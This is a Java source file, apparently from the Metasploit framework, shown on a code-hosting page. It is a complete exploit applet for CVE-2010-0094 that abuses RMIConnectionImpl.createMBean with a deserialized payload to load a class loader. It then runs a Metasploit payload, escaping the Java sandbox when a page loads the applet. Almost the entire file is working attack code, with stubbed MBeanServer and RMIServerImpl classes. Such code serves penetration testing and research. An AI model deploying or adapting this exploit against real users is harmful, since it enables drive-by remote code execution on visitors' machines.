Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/external/source/exploits/CVE-2010-0094/Exploit.java
Views: 11779
import java.applet.Applet;1import java.io.IOException;2import java.io.InputStream;3import java.io.ObjectInputStream;4import java.rmi.MarshalledObject;5import java.rmi.Remote;6import java.util.Set;78import javax.management.Attribute;9import javax.management.AttributeList;10import javax.management.AttributeNotFoundException;11import javax.management.InstanceAlreadyExistsException;12import javax.management.InstanceNotFoundException;13import javax.management.IntrospectionException;14import javax.management.InvalidAttributeValueException;15import javax.management.ListenerNotFoundException;16import javax.management.MBeanException;17import javax.management.MBeanInfo;18import javax.management.MBeanRegistrationException;19import javax.management.MBeanServer;20import javax.management.NotCompliantMBeanException;21import javax.management.NotificationFilter;22import javax.management.NotificationListener;23import javax.management.ObjectInstance;24import javax.management.ObjectName;25import javax.management.OperationsException;26import javax.management.QueryExp;27import javax.management.ReflectionException;28import javax.management.loading.ClassLoaderRepository;29import javax.management.remote.rmi.RMIConnection;30import javax.management.remote.rmi.RMIConnectionImpl;31import javax.management.remote.rmi.RMIServerImpl;32import javax.security.auth.Subject;3334import metasploit.Payload;3536/**37* This class exploits the vulnerability in the RMIConnectionImpl class by38* loading the serialized PayloadClassloader.39*40* @author mka41*42*/43public class Exploit extends Applet {4445private static final long serialVersionUID = 2205862970052148546L;4647@Override48public void init() {49try {5051MarshalledObject params = this.getPayload();5253RMIServerImpl impl = getRMIServerImpl();54impl.setMBeanServer(getMbeanServer());55RMIConnectionImpl connectionImpl = new RMIConnectionImpl(impl,56"metasploit", null, null, null);5758connectionImpl.createMBean("PayloadClassLoader", null, null,59params, null, null);6061} catch (Exception e) {62try {6364PayloadClassLoader.instance.loadIt();65Payload.main(null);66} catch (Exception e1) {6768}6970}7172}7374private MBeanServer getMbeanServer() {7576return new MBeanServer() {7778@Override79public void unregisterMBean(ObjectName name)80throws InstanceNotFoundException,81MBeanRegistrationException {8283}8485@Override86public AttributeList setAttributes(ObjectName name,87AttributeList attributes) throws InstanceNotFoundException,88ReflectionException {8990return null;91}9293@Override94public void setAttribute(ObjectName name, Attribute attribute)95throws InstanceNotFoundException,96AttributeNotFoundException, InvalidAttributeValueException,97MBeanException, ReflectionException {9899}100101@Override102public void removeNotificationListener(ObjectName name,103NotificationListener listener, NotificationFilter filter,104Object handback) throws InstanceNotFoundException,105ListenerNotFoundException {106107}108109@Override110public void removeNotificationListener(ObjectName name,111ObjectName listener, NotificationFilter filter,112Object handback) throws InstanceNotFoundException,113ListenerNotFoundException {114115}116117@Override118public void removeNotificationListener(ObjectName name,119NotificationListener listener)120throws InstanceNotFoundException, ListenerNotFoundException {121122}123124@Override125public void removeNotificationListener(ObjectName name,126ObjectName listener) throws InstanceNotFoundException,127ListenerNotFoundException {128129}130131@Override132public ObjectInstance registerMBean(Object object, ObjectName name)133throws InstanceAlreadyExistsException,134MBeanRegistrationException, NotCompliantMBeanException {135136return null;137}138139@Override140public Set<ObjectName> queryNames(ObjectName name, QueryExp query) {141142return null;143}144145@Override146public Set<ObjectInstance> queryMBeans(ObjectName name,147QueryExp query) {148149return null;150}151152@Override153public boolean isRegistered(ObjectName name) {154155return false;156}157158@Override159public boolean isInstanceOf(ObjectName name, String className)160throws InstanceNotFoundException {161162return false;163}164165@Override166public Object invoke(ObjectName name, String operationName,167Object[] params, String[] signature)168throws InstanceNotFoundException, MBeanException,169ReflectionException {170171return null;172}173174@Override175public Object instantiate(String className, ObjectName loaderName,176Object[] params, String[] signature)177throws ReflectionException, MBeanException,178InstanceNotFoundException {179180return null;181}182183@Override184public Object instantiate(String className, Object[] params,185String[] signature) throws ReflectionException,186MBeanException {187188return null;189}190191@Override192public Object instantiate(String className, ObjectName loaderName)193throws ReflectionException, MBeanException,194InstanceNotFoundException {195196return null;197}198199@Override200public Object instantiate(String className)201throws ReflectionException, MBeanException {202203return null;204}205206@Override207public ObjectInstance getObjectInstance(ObjectName name)208throws InstanceNotFoundException {209210return null;211}212213@Override214public MBeanInfo getMBeanInfo(ObjectName name)215throws InstanceNotFoundException, IntrospectionException,216ReflectionException {217218return null;219}220221@Override222public Integer getMBeanCount() {223224return null;225}226227@Override228public String[] getDomains() {229230return null;231}232233@Override234public String getDefaultDomain() {235236return null;237}238239@Override240public ClassLoaderRepository getClassLoaderRepository() {241242return new ClassLoaderRepository() {243244@Override245public Class<?> loadClassWithout(ClassLoader exclude,246String className) throws ClassNotFoundException {247248return null;249}250251@Override252public Class<?> loadClassBefore(ClassLoader stop,253String className) throws ClassNotFoundException {254255return null;256}257258@Override259public Class<?> loadClass(String className)260throws ClassNotFoundException {261262return null;263}264};265}266267@Override268public ClassLoader getClassLoaderFor(ObjectName mbeanName)269throws InstanceNotFoundException {270271return null;272}273274@Override275public ClassLoader getClassLoader(ObjectName loaderName)276throws InstanceNotFoundException {277278return null;279}280281@Override282public AttributeList getAttributes(ObjectName name,283String[] attributes) throws InstanceNotFoundException,284ReflectionException {285286return null;287}288289@Override290public Object getAttribute(ObjectName name, String attribute)291throws MBeanException, AttributeNotFoundException,292InstanceNotFoundException, ReflectionException {293294return null;295}296297@Override298public ObjectInputStream deserialize(String className,299ObjectName loaderName, byte[] data)300throws InstanceNotFoundException, OperationsException,301ReflectionException {302303return null;304}305306@Override307public ObjectInputStream deserialize(String className, byte[] data)308throws OperationsException, ReflectionException {309310return null;311}312313@Override314public ObjectInputStream deserialize(ObjectName name, byte[] data)315throws InstanceNotFoundException, OperationsException {316317return null;318}319320@Override321public ObjectInstance createMBean(String className,322ObjectName name, ObjectName loaderName, Object[] params,323String[] signature) throws ReflectionException,324InstanceAlreadyExistsException, MBeanRegistrationException,325MBeanException, NotCompliantMBeanException,326InstanceNotFoundException {327328return null;329}330331@Override332public ObjectInstance createMBean(String className,333ObjectName name, Object[] params, String[] signature)334throws ReflectionException, InstanceAlreadyExistsException,335MBeanRegistrationException, MBeanException,336NotCompliantMBeanException {337338return null;339}340341@Override342public ObjectInstance createMBean(String className,343ObjectName name, ObjectName loaderName)344throws ReflectionException, InstanceAlreadyExistsException,345MBeanRegistrationException, MBeanException,346NotCompliantMBeanException, InstanceNotFoundException {347348return null;349}350351@Override352public ObjectInstance createMBean(String className, ObjectName name)353throws ReflectionException, InstanceAlreadyExistsException,354MBeanRegistrationException, MBeanException,355NotCompliantMBeanException {356357return null;358}359360@Override361public void addNotificationListener(ObjectName name,362ObjectName listener, NotificationFilter filter,363Object handback) throws InstanceNotFoundException {364365}366367@Override368public void addNotificationListener(ObjectName name,369NotificationListener listener, NotificationFilter filter,370Object handback) throws InstanceNotFoundException {371372}373};374}375376private RMIServerImpl getRMIServerImpl() {377378return new RMIServerImpl(null) {379380@Override381public Remote toStub() throws IOException {382383return null;384}385386@Override387protected RMIConnection makeClient(String connectionId,388Subject subject) throws IOException {389390return null;391}392393@Override394protected String getProtocol() {395396return null;397}398399@Override400protected void export() throws IOException {401402}403404@Override405protected void closeServer() throws IOException {406407}408409@Override410protected void closeClient(RMIConnection client) throws IOException {411412}413};414415}416417public MarshalledObject getPayload() throws IOException,418ClassNotFoundException {419420InputStream f = super.getClass().getResourceAsStream("payload.ser");421ObjectInputStream stream = new ObjectInputStream(f);422MarshalledObject object = (MarshalledObject) stream.readObject();423stream.close();424return object;425426}427}428429430